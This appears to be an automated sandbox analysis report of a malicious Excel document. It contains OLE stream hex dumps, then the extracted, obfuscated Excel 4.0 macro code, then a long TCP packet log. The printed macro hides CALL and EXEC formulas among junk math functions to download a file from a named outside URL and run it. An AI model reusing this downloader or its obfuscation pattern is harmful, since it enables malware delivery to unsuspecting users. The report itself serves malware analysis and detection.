Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.247889866731
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	255780
Entropy:	3.03349063455
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
Data Raw:	09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,

,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,

=HALT()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2021 07:16:27.741127014 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:27.901099920 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:27.901221991 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:27.901808023 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.061494112 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287130117 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287158012 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287175894 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287195921 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287225008 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287251949 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287273884 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287327051 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287329912 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.287357092 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287360907 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.287391901 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.287420988 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.287563086 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.287655115 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447206020 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447237968 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447252035 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447266102 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447283983 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447309017 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447324991 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447374105 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447418928 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447515011 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447556019 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447570086 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447573900 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447613001 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447705030 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447736025 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447805882 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447812080 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447840929 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447858095 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447873116 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447875977 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447886944 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447894096 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447911978 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447916985 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447936058 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447966099 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447967052 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.447997093 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.447998047 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.448050022 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.448069096 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607326984 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607366085 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607389927 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607461929 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607474089 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607498884 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607508898 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607536077 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607558012 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607558966 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607578993 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607584000 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607603073 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607623100 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607625961 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607656956 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607690096 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607697010 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607718945 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607739925 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607742071 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607770920 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607796907 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607809067 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607852936 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607884884 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607929945 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.607932091 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.607976913 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608165026 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608218908 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608309984 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608360052 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608393908 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608438015 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608467102 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608494043 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608513117 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608520985 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608534098 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608547926 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608566046 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608577967 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608591080 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608604908 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608618975 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608649015 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608669996 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608707905 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608773947 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608817101 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608838081 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608865023 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608885050 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608890057 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608901024 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608917952 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608931065 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608942986 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.608964920 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.608985901 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.609010935 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.609078884 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.609138966 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.609189987 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.609236956 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.609287977 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.609309912 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.609365940 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.609431028 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.609460115 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.609483004 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.609487057 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.609510899 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.609530926 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.609536886 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.609580994 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.767488003 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767524004 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767546892 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767570019 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767595053 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767616987 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767642021 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767719030 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767731905 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.767760992 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767786026 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767807961 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767831087 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767853975 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.767904043 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767929077 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.767965078 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.767968893 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768012047 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768033981 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768035889 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768121958 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768177986 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768204927 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768256903 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768270016 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768296957 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768356085 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768413067 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768444061 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768448114 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768477917 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768502951 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768527985 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768532991 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768587112 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768642902 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768688917 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768709898 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768753052 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768776894 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768788099 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768802881 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768831015 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768857002 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.768877029 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768903971 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768929005 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768953085 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.768970013 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769053936 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769085884 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.769110918 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.769156933 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769253016 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769279957 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.769325972 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.769351006 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769419909 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769434929 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.769557953 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769587994 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.769613981 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.769666910 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769694090 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.769737959 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.769810915 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.770078897 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.770106077 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.770134926 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.770159006 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.770220995 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.770246029 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.770275116 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.770311117 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.770396948 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.770411015 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.770468950 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.770524025 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.770600080 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.770623922 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.770699978 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771115065 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771145105 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771190882 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771253109 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771260977 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771270037 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771328926 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771353960 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771437883 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771476984 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771554947 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771557093 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771650076 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771678925 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771749973 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771752119 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771784067 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771831036 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771838903 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771882057 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771924019 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771959066 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.771962881 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.771982908 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772000074 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772007942 CEST	49715	80	192.168.2.6	192.232.249.186
Apr 7, 2021 07:16:28.772017956 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772034883 CEST	80	49715	192.232.249.186	192.168.2.6
Apr 7, 2021 07:16:28.772064924 CEST	49715	80	192.168.2.6	192.232.249.186
